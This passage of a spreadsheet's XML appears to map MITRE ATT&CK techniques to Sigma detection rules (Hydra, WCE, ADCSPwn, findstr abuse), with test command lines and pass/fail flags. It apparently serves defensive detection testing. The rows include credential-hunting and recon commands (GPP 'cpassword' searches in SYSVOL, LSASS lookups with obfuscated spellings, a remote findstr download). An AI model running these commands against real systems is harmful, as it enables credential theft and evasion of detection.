      <c r="A1783" s="43" t="n"/>
      <c r="B1783" s="43" t="n"/>
      <c r="C1783" s="43" t="n"/>
      <c r="D1783" s="43" t="n"/>
      <c r="E1783" s="43" t="n"/>
      <c r="F1783" s="43" t="n"/>
      <c r="G1783" s="43" t="n"/>
      <c r="H1783" s="43" t="n"/>
      <c r="I1783" s="43" t="n"/>
      <c r="J1783" s="43" t="n"/>
    </row>
    <row r="1784" ht="15.75" customHeight="1" s="42">
      <c r="A1784" s="43" t="n"/>
      <c r="B1784" s="43" t="n"/>
      <c r="C1784" s="43" t="n"/>
      <c r="D1784" s="43" t="n"/>
      <c r="E1784" s="43" t="n"/>
      <c r="F1784" s="43" t="n"/>
      <c r="G1784" s="43" t="n"/>
      <c r="H1784" s="43" t="n"/>
      <c r="I1784" s="43" t="n"/>
      <c r="J1784" s="43" t="n"/>
    </row>
    <row r="1785" ht="15.75" customHeight="1" s="42">
      <c r="A1785" s="43" t="n"/>
      <c r="B1785" s="43" t="n"/>
      <c r="C1785" s="43" t="n"/>
      <c r="D1785" s="43" t="n"/>
      <c r="E1785" s="43" t="n"/>
      <c r="F1785" s="43" t="n"/>
      <c r="G1785" s="43" t="n"/>
      <c r="H1785" s="43" t="n"/>
      <c r="I1785" s="43" t="n"/>
      <c r="J1785" s="43" t="n"/>
    </row>
    <row r="1786" ht="15.75" customHeight="1" s="42">
      <c r="A1786" s="43" t="n"/>
      <c r="B1786" s="43" t="n"/>
      <c r="C1786" s="43" t="n"/>
      <c r="D1786" s="43" t="n"/>
      <c r="E1786" s="43" t="n"/>
      <c r="F1786" s="43" t="n"/>
      <c r="G1786" s="43" t="n"/>
      <c r="H1786" s="43" t="n"/>
      <c r="I1786" s="43" t="n"/>
      <c r="J1786" s="43" t="n"/>
    </row>
    <row r="1787" ht="15.75" customHeight="1" s="42">
      <c r="A1787" s="43" t="n"/>
      <c r="B1787" s="43" t="n"/>
      <c r="C1787" s="43" t="n"/>
      <c r="D1787" s="43" t="n"/>
      <c r="E1787" s="43" t="n"/>
      <c r="F1787" s="43" t="n"/>
      <c r="G1787" s="43" t="n"/>
      <c r="H1787" s="43" t="n"/>
      <c r="I1787" s="43" t="n"/>
      <c r="J1787" s="43" t="n"/>
    </row>
    <row r="1788" ht="15.75" customHeight="1" s="42">
      <c r="A1788" s="43" t="n"/>
      <c r="B1788" s="43" t="n"/>
      <c r="C1788" s="43" t="n"/>
      <c r="D1788" s="43" t="n"/>
      <c r="E1788" s="43" t="n"/>
      <c r="F1788" s="43" t="n"/>
      <c r="G1788" s="43" t="n"/>
      <c r="H1788" s="43" t="n"/>
      <c r="I1788" s="43" t="n"/>
      <c r="J1788" s="43" t="n"/>
    </row>
    <row r="1789" ht="15.75" customHeight="1" s="42">
      <c r="A1789" s="43" t="n"/>
      <c r="B1789" s="43" t="n"/>
      <c r="C1789" s="43" t="n"/>
      <c r="D1789" s="43" t="n"/>
      <c r="E1789" s="43" t="n"/>
      <c r="F1789" s="43" t="n"/>
      <c r="G1789" s="43" t="n"/>
      <c r="H1789" s="43" t="n"/>
      <c r="I1789" s="43" t="n"/>
      <c r="J1789" s="43" t="n"/>
    </row>
    <row r="1790" ht="15.75" customHeight="1" s="42">
      <c r="A1790" s="43" t="n"/>
      <c r="B1790" s="43" t="n"/>
      <c r="C1790" s="43" t="n"/>
      <c r="D1790" s="43" t="n"/>
      <c r="E1790" s="43" t="n"/>
      <c r="F1790" s="43" t="n"/>
      <c r="G1790" s="43" t="n"/>
      <c r="H1790" s="43" t="n"/>
      <c r="I1790" s="43" t="n"/>
      <c r="J1790" s="43" t="n"/>
    </row>
    <row r="1791" ht="15.75" customHeight="1" s="42">
      <c r="A1791" s="43" t="n"/>
      <c r="B1791" s="43" t="n"/>
      <c r="C1791" s="43" t="n"/>
      <c r="D1791" s="43" t="n"/>
      <c r="E1791" s="43" t="n"/>
      <c r="F1791" s="43" t="n"/>
      <c r="G1791" s="43" t="n"/>
      <c r="H1791" s="43" t="n"/>
      <c r="I1791" s="43" t="n"/>
      <c r="J1791" s="43" t="n"/>
    </row>
    <row r="1792" ht="15.75" customHeight="1" s="42">
      <c r="A1792" s="43" t="n"/>
      <c r="B1792" s="43" t="n"/>
      <c r="C1792" s="43" t="n"/>
      <c r="D1792" s="43" t="n"/>
      <c r="E1792" s="43" t="n"/>
      <c r="F1792" s="43" t="n"/>
      <c r="G1792" s="43" t="n"/>
      <c r="H1792" s="43" t="n"/>
      <c r="I1792" s="43" t="n"/>
      <c r="J1792" s="43" t="n"/>
    </row>
    <row r="1793" ht="15.75" customHeight="1" s="42">
      <c r="A1793" s="43" t="n"/>
      <c r="B1793" s="43" t="n"/>
      <c r="C1793" s="43" t="n"/>
      <c r="D1793" s="43" t="n"/>
      <c r="E1793" s="43" t="n"/>
      <c r="F1793" s="43" t="n"/>
      <c r="G1793" s="43" t="n"/>
      <c r="H1793" s="43" t="n"/>
      <c r="I1793" s="43" t="n"/>
      <c r="J1793" s="43" t="n"/>
    </row>
    <row r="1794" ht="15.75" customHeight="1" s="42">
      <c r="A1794" s="43" t="n"/>
      <c r="B1794" s="43" t="n"/>
      <c r="C1794" s="43" t="n"/>
      <c r="D1794" s="43" t="n"/>
      <c r="E1794" s="43" t="n"/>
      <c r="F1794" s="43" t="n"/>
      <c r="G1794" s="43" t="n"/>
      <c r="H1794" s="43" t="n"/>
      <c r="I1794" s="43" t="n"/>
      <c r="J1794" s="43" t="n"/>
    </row>
    <row r="1795" ht="15.75" customHeight="1" s="42">
      <c r="A1795" s="43" t="n"/>
      <c r="B1795" s="43" t="n"/>
      <c r="C1795" s="43" t="n"/>
      <c r="D1795" s="43" t="n"/>
      <c r="E1795" s="43" t="n"/>
      <c r="F1795" s="43" t="n"/>
      <c r="G1795" s="43" t="n"/>
      <c r="H1795" s="43" t="n"/>
      <c r="I1795" s="43" t="n"/>
      <c r="J1795" s="43" t="n"/>
    </row>
    <row r="1796" ht="15.75" customHeight="1" s="42">
      <c r="A1796" s="43" t="n"/>
      <c r="B1796" s="43" t="n"/>
      <c r="C1796" s="43" t="n"/>
      <c r="D1796" s="43" t="n"/>
      <c r="E1796" s="43" t="n"/>
      <c r="F1796" s="43" t="n"/>
      <c r="G1796" s="43" t="n"/>
      <c r="H1796" s="43" t="n"/>
      <c r="I1796" s="43" t="n"/>
      <c r="J1796" s="43" t="n"/>
    </row>
    <row r="1797" ht="15.75" customHeight="1" s="42">
      <c r="A1797" s="43" t="n"/>
      <c r="B1797" s="43" t="n"/>
      <c r="C1797" s="43" t="n"/>
      <c r="D1797" s="43" t="n"/>
      <c r="E1797" s="43" t="n"/>
      <c r="F1797" s="43" t="n"/>
      <c r="G1797" s="43" t="n"/>
      <c r="H1797" s="43" t="n"/>
      <c r="I1797" s="43" t="n"/>
      <c r="J1797" s="43" t="n"/>
    </row>
    <row r="1798" ht="15.75" customHeight="1" s="42">
      <c r="A1798" s="43" t="n"/>
      <c r="B1798" s="43" t="n"/>
      <c r="C1798" s="43" t="n"/>
      <c r="D1798" s="43" t="n"/>
      <c r="E1798" s="43" t="n"/>
      <c r="F1798" s="43" t="n"/>
      <c r="G1798" s="43" t="n"/>
      <c r="H1798" s="43" t="n"/>
      <c r="I1798" s="43" t="n"/>
      <c r="J1798" s="43" t="n"/>
    </row>
    <row r="1799" ht="15.75" customHeight="1" s="42">
      <c r="A1799" s="43" t="n"/>
      <c r="B1799" s="43" t="n"/>
      <c r="C1799" s="43" t="n"/>
      <c r="D1799" s="43" t="n"/>
      <c r="E1799" s="43" t="n"/>
      <c r="F1799" s="43" t="n"/>
      <c r="G1799" s="43" t="n"/>
      <c r="H1799" s="43" t="n"/>
      <c r="I1799" s="43" t="n"/>
      <c r="J1799" s="43" t="n"/>
    </row>
    <row r="1800" ht="15.75" customHeight="1" s="42">
      <c r="A1800" s="43" t="n"/>
      <c r="B1800" s="43" t="n"/>
      <c r="C1800" s="43" t="n"/>
      <c r="D1800" s="43" t="n"/>
      <c r="E1800" s="43" t="n"/>
      <c r="F1800" s="43" t="n"/>
      <c r="G1800" s="43" t="n"/>
      <c r="H1800" s="43" t="n"/>
      <c r="I1800" s="43" t="n"/>
      <c r="J1800" s="43" t="n"/>
    </row>
    <row r="1801" ht="15.75" customHeight="1" s="42">
      <c r="A1801" s="43" t="n"/>
      <c r="B1801" s="43" t="n"/>
      <c r="C1801" s="43" t="n"/>
      <c r="D1801" s="43" t="n"/>
      <c r="E1801" s="43" t="n"/>
      <c r="F1801" s="43" t="n"/>
      <c r="G1801" s="43" t="n"/>
      <c r="H1801" s="43" t="n"/>
      <c r="I1801" s="43" t="n"/>
      <c r="J1801" s="43" t="n"/>
    </row>
    <row r="1802" ht="15.75" customHeight="1" s="42">
      <c r="A1802" s="43" t="n"/>
      <c r="B1802" s="43" t="n"/>
      <c r="C1802" s="43" t="n"/>
      <c r="D1802" s="43" t="n"/>
      <c r="E1802" s="43" t="n"/>
      <c r="F1802" s="43" t="n"/>
      <c r="G1802" s="43" t="n"/>
      <c r="H1802" s="43" t="n"/>
      <c r="I1802" s="43" t="n"/>
      <c r="J1802" s="43" t="n"/>
    </row>
    <row r="1803" ht="15.75" customHeight="1" s="42">
      <c r="A1803" s="43" t="n"/>
      <c r="B1803" s="43" t="n"/>
      <c r="C1803" s="43" t="n"/>
      <c r="D1803" s="43" t="n"/>
      <c r="E1803" s="43" t="n"/>
      <c r="F1803" s="43" t="n"/>
      <c r="G1803" s="43" t="n"/>
      <c r="H1803" s="43" t="n"/>
      <c r="I1803" s="43" t="n"/>
      <c r="J1803" s="43" t="n"/>
    </row>
    <row r="1804" ht="15.75" customHeight="1" s="42">
      <c r="A1804" s="43" t="n"/>
      <c r="B1804" s="43" t="n"/>
      <c r="C1804" s="43" t="n"/>
      <c r="D1804" s="43" t="n"/>
      <c r="E1804" s="43" t="n"/>
      <c r="F1804" s="43" t="n"/>
      <c r="G1804" s="43" t="n"/>
      <c r="H1804" s="43" t="n"/>
      <c r="I1804" s="43" t="n"/>
      <c r="J1804" s="43" t="n"/>
    </row>
    <row r="1805" ht="15.75" customHeight="1" s="42">
      <c r="A1805" s="43" t="n"/>
      <c r="B1805" s="43" t="n"/>
      <c r="C1805" s="43" t="n"/>
      <c r="D1805" s="43" t="n"/>
      <c r="E1805" s="43" t="n"/>
      <c r="F1805" s="43" t="n"/>
      <c r="G1805" s="43" t="n"/>
      <c r="H1805" s="43" t="n"/>
      <c r="I1805" s="43" t="n"/>
      <c r="J1805" s="43" t="n"/>
    </row>
    <row r="1806" ht="15.75" customHeight="1" s="42">
      <c r="A1806" s="43" t="n"/>
      <c r="B1806" s="43" t="n"/>
      <c r="C1806" s="43" t="n"/>
      <c r="D1806" s="43" t="n"/>
      <c r="E1806" s="43" t="n"/>
      <c r="F1806" s="43" t="n"/>
      <c r="G1806" s="43" t="n"/>
      <c r="H1806" s="43" t="n"/>
      <c r="I1806" s="43" t="n"/>
      <c r="J1806" s="43" t="n"/>
    </row>
    <row r="1807" ht="15.75" customHeight="1" s="42">
      <c r="A1807" s="43" t="n"/>
      <c r="B1807" s="43" t="n"/>
      <c r="C1807" s="43" t="n"/>
      <c r="D1807" s="43" t="n"/>
      <c r="E1807" s="43" t="n"/>
      <c r="F1807" s="43" t="n"/>
      <c r="G1807" s="43" t="n"/>
      <c r="H1807" s="43" t="n"/>
      <c r="I1807" s="43" t="n"/>
      <c r="J1807" s="43" t="n"/>
    </row>
    <row r="1808" ht="15.75" customHeight="1" s="42">
      <c r="A1808" s="43" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B1808" s="34" t="n"/>
      <c r="C1808" s="34" t="n"/>
      <c r="D1808" s="34" t="n"/>
      <c r="E1808" s="34" t="n"/>
      <c r="F1808" s="43" t="n"/>
      <c r="G1808" s="43" t="n"/>
      <c r="H1808" s="43" t="n"/>
      <c r="I1808" s="43" t="n"/>
      <c r="J1808" s="43" t="n"/>
      <c r="K1808" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1809" ht="15.75" customHeight="1" s="42">
      <c r="A1809" s="43" t="n"/>
      <c r="B1809" s="34" t="n"/>
      <c r="C1809" s="34" t="n"/>
      <c r="D1809" s="34" t="n"/>
      <c r="E1809" s="34" t="n"/>
      <c r="F1809" s="43" t="n"/>
      <c r="G1809" s="43" t="n"/>
      <c r="H1809" s="43" t="n"/>
      <c r="I1809" s="43" t="n"/>
      <c r="J1809" s="43" t="n"/>
    </row>
    <row r="1810" ht="15.75" customHeight="1" s="42">
      <c r="A1810" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1810" s="34" t="n"/>
      <c r="C1810" s="34" t="n"/>
      <c r="D1810" s="34" t="n"/>
      <c r="E1810" s="34" t="n"/>
      <c r="F1810" s="43" t="n"/>
      <c r="G1810" s="43" t="n"/>
      <c r="H1810" s="43" t="n"/>
      <c r="I1810" s="43" t="n"/>
      <c r="J1810" s="43" t="n"/>
      <c r="K1810" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1811" ht="15.75" customHeight="1" s="42">
      <c r="A1811" s="43" t="n"/>
      <c r="B1811" s="34" t="n"/>
      <c r="C1811" s="34" t="n"/>
      <c r="D1811" s="34" t="n"/>
      <c r="E1811" s="34" t="n"/>
      <c r="F1811" s="43" t="n"/>
      <c r="G1811" s="43" t="n"/>
      <c r="H1811" s="43" t="n"/>
      <c r="I1811" s="43" t="n"/>
      <c r="J1811" s="43" t="n"/>
    </row>
    <row r="1812" ht="15.75" customHeight="1" s="42">
      <c r="A1812" s="43" t="inlineStr">
        <is>
          <t>t1110.001</t>
        </is>
      </c>
      <c r="B1812" s="34" t="n"/>
      <c r="C1812" s="34" t="n"/>
      <c r="D1812" s="34" t="n"/>
      <c r="E1812" s="34" t="n"/>
      <c r="F1812" s="43" t="n"/>
      <c r="G1812" s="43" t="n"/>
      <c r="H1812" s="43" t="n"/>
      <c r="I1812" s="43" t="n"/>
      <c r="J1812" s="43" t="n"/>
      <c r="K1812" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1813" ht="15.75" customHeight="1" s="42">
      <c r="A1813" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1813" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_adcspwn</t>
        </is>
      </c>
      <c r="C1813" s="44" t="inlineStr">
        <is>
          <t>HackTool - ADCSPwn Execution</t>
        </is>
      </c>
      <c r="D1813" s="44" t="inlineStr">
        <is>
          <t>cd8c163e-a19b-402e-bdd5-419ff5859f12</t>
        </is>
      </c>
      <c r="E1813" s="44" t="n"/>
      <c r="F1813" s="44" t="n"/>
      <c r="G1813" s="44" t="n"/>
      <c r="H1813" s="44" t="n"/>
      <c r="I1813" s="44" t="n"/>
      <c r="J1813" s="44" t="n"/>
      <c r="K1813" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1814" ht="15.75" customHeight="1" s="42">
      <c r="A1814" s="44" t="n"/>
      <c r="B1814" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hydra</t>
        </is>
      </c>
      <c r="C1814" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hydra Password Bruteforce Execution</t>
        </is>
      </c>
      <c r="D1814" s="44" t="inlineStr">
        <is>
          <t>aaafa146-074c-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1814" s="44" t="n"/>
      <c r="F1814" s="44" t="n"/>
      <c r="G1814" s="44" t="n"/>
      <c r="H1814" s="44" t="n"/>
      <c r="I1814" s="44" t="n"/>
      <c r="J1814" s="44" t="n"/>
      <c r="K1814" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1815" ht="15.75" customHeight="1" s="42">
      <c r="A1815" s="44" t="inlineStr">
        <is>
          <t>t1110.001</t>
        </is>
      </c>
      <c r="B1815" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hydra</t>
        </is>
      </c>
      <c r="C1815" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hydra Password Bruteforce Execution</t>
        </is>
      </c>
      <c r="D1815" s="44" t="inlineStr">
        <is>
          <t>aaafa146-074c-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1815" s="44" t="n"/>
      <c r="F1815" s="44" t="n"/>
      <c r="G1815" s="44" t="n"/>
      <c r="H1815" s="44" t="n"/>
      <c r="I1815" s="44" t="n"/>
      <c r="J1815" s="44" t="n"/>
      <c r="K1815" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1816" ht="15.75" customHeight="1" s="42">
      <c r="A1816" s="44" t="n"/>
      <c r="B1816" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_wce</t>
        </is>
      </c>
      <c r="C1816" s="44" t="inlineStr">
        <is>
          <t>HackTool - Windows Credential Editor (WCE) Execution</t>
        </is>
      </c>
      <c r="D1816" s="44" t="inlineStr">
        <is>
          <t>7aa7009a-28b9-4344-8c1f-159489a390df</t>
        </is>
      </c>
      <c r="E1816" s="44" t="n"/>
      <c r="F1816" s="44" t="n"/>
      <c r="G1816" s="44" t="n"/>
      <c r="H1816" s="44" t="n"/>
      <c r="I1816" s="44" t="n"/>
      <c r="J1816" s="44" t="n"/>
      <c r="K1816" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1817" ht="15.75" customHeight="1" s="42">
      <c r="A1817" s="44" t="n"/>
      <c r="B1817" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ditsnap</t>
        </is>
      </c>
      <c r="C1817" s="44" t="inlineStr">
        <is>
          <t>PUA - DIT Snapshot Viewer</t>
        </is>
      </c>
      <c r="D1817" s="44" t="inlineStr">
        <is>
          <t>d3b70aad-097e-409c-9df2-450f80dc476b</t>
        </is>
      </c>
      <c r="E1817" s="44" t="n"/>
      <c r="F1817" s="44" t="n"/>
      <c r="G1817" s="44" t="n"/>
      <c r="H1817" s="44" t="n"/>
      <c r="I1817" s="44" t="n"/>
      <c r="J1817" s="44" t="n"/>
      <c r="K1817" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1818" ht="15.75" customHeight="1" s="42">
      <c r="A1818" s="44" t="n"/>
      <c r="B1818" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_sysvol_access</t>
        </is>
      </c>
      <c r="C1818" s="44" t="inlineStr">
        <is>
          <t>Suspicious SYSVOL Domain Group Policy Access</t>
        </is>
      </c>
      <c r="D1818" s="44" t="inlineStr">
        <is>
          <t>05f3c945-dcc8-4393-9f3d-af65077a8f86</t>
        </is>
      </c>
      <c r="E1818" s="44" t="n"/>
      <c r="F1818" s="44" t="n"/>
      <c r="G1818" s="44" t="n"/>
      <c r="H1818" s="44" t="n"/>
      <c r="I1818" s="44" t="n"/>
      <c r="J1818" s="44" t="n"/>
      <c r="K1818" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1819" ht="15.75" customHeight="1" s="42">
      <c r="A1819" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1819" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C1819" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1819" s="44" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E1819" s="44" t="inlineStr">
        <is>
          <t>findstr.exe "-v" "-l" "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F1819" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1819" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1819" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1819" s="44" t="n"/>
      <c r="J1819" s="44" t="n"/>
      <c r="K1819" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1820" ht="15.75" customHeight="1" s="42">
      <c r="A1820" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1820" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C1820" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1820" s="44" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E1820" s="44" t="inlineStr">
        <is>
          <t>findstr.exe	/v	/l	"TEST-HOST"	\\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F1820" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1820" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1820" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1820" s="44" t="n"/>
      <c r="J1820" s="44" t="n"/>
      <c r="K1820" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1821" ht="15.75" customHeight="1" s="42">
      <c r="A1821" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1821" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C1821" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1821" s="44" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E1821" s="44" t="inlineStr">
        <is>
          <t>findstr.exe /vl "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F1821" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1821" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1821" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1821" s="44" t="n"/>
      <c r="J1821" s="44" t="n"/>
      <c r="K1821" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1822" ht="15.75" customHeight="1" s="42">
      <c r="A1822" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1822" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1822" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1822" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1822" s="44" t="inlineStr">
        <is>
          <t>secedit.exe -export /areas SECURITYPOLICY -cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F1822" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1822" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1822" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1822" s="44" t="n"/>
      <c r="J1822" s="44" t="n"/>
      <c r="K1822" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1823" ht="15.75" customHeight="1" s="42">
      <c r="A1823" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1823" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_gpp_passwords</t>
        </is>
      </c>
      <c r="C1823" s="44" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords</t>
        </is>
      </c>
      <c r="D1823" s="44" t="inlineStr">
        <is>
          <t>91a2c315-9ee6-4052-a853-6f6a8238f90d</t>
        </is>
      </c>
      <c r="E1823" s="44" t="inlineStr">
        <is>
          <t>findstr /S cpa""ssword \\THAIMX\sysvol\*.xml</t>
        </is>
      </c>
      <c r="F1823" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1823" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1823" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1823" s="44" t="n"/>
      <c r="J1823" s="44" t="n"/>
      <c r="K1823" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1824" ht="15.75" customHeight="1" s="42">
      <c r="A1824" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1824" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_gpp_passwords</t>
        </is>
      </c>
      <c r="C1824" s="44" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords</t>
        </is>
      </c>
      <c r="D1824" s="44" t="inlineStr">
        <is>
          <t>91a2c315-9ee6-4052-a853-6f6a8238f90d</t>
        </is>
      </c>
      <c r="E1824" s="44" t="inlineStr">
        <is>
          <t>findstr /S cpassword \\THAIMX\sysvol\*.xm""l</t>
        </is>
      </c>
      <c r="F1824" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1824" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1824" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1824" s="44" t="n"/>
      <c r="J1824" s="44" t="n"/>
      <c r="K1824" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1825" ht="15.75" customHeight="1" s="42">
      <c r="A1825" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1825" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C1825" s="44" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1825" s="44" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E1825" s="44" t="inlineStr">
        <is>
          <t>findstr lsa""ss</t>
        </is>
      </c>
      <c r="F1825" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1825" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1825" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1825" s="44" t="n"/>
      <c r="J1825" s="44" t="n"/>
      <c r="K1825" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1826" ht="15.75" customHeight="1" s="42">
      <c r="A1826" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1826" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C1826" s="44" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1826" s="44" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E1826" s="44" t="inlineStr">
        <is>
          <t>findstr [l][s][a][s][s]</t>
        </is>
      </c>
      <c r="F1826" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1826" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1826" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1826" s="44" t="n"/>
      <c r="J1826" s="44" t="n"/>
      <c r="K1826" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1827" ht="15.75" customHeight="1" s="42">
      <c r="A1827" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1827" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C1827" s="44" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1827" s="44" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E1827" s="44" t="inlineStr">
        <is>
          <t>findstr lsa.s</t>
        </is>
      </c>
      <c r="F1827" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1827" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1827" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1827" s="44" t="n"/>
      <c r="J1827" s="44" t="n"/>
      <c r="K1827" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1828" ht="15.75" customHeight="1" s="42">
      <c r="A1828" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1828" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C1828" s="44" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1828" s="44" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E1828" s="44" t="inlineStr">
        <is>
          <t>icacls "C:\Program Files\*" 2&gt;nul | findstr "Everyo""ne"</t>
        </is>
      </c>
      <c r="F1828" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1828" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1828" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1828" s="44" t="n"/>
      <c r="J1828" s="44" t="n"/>
      <c r="K1828" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1829" ht="15.75" customHeight="1" s="42">
      <c r="A1829" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1829" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C1829" s="44" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1829" s="44" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
